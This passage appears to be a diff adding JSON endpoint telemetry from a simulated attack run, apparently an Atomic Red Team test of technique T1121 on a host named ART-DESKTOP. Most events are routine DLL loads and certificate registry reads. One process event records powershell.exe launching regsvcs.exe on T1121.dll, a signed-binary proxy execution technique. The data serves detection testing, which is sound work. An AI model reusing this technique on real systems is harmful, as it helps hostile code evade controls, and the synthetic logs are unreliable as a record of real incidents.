"{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + 
"timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "psapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\psapi.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570869960000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mscorlib.ni.dll", + "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", + "pid": 5012, + 
"process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570868090000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, 
+ { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570870270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clrjit.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570868250000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "timestamp": 131883570870580000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "event_type": "process", + "pid": 7696, + "process_name": "csc.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", + "subtype": "terminate", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" + }, + { + "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1976, + "ppid": 7036, + "process_name": "RegSvcs.exe", + "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "subtype": "create", + "timestamp": 131883570870840000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570870740000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 1976, 
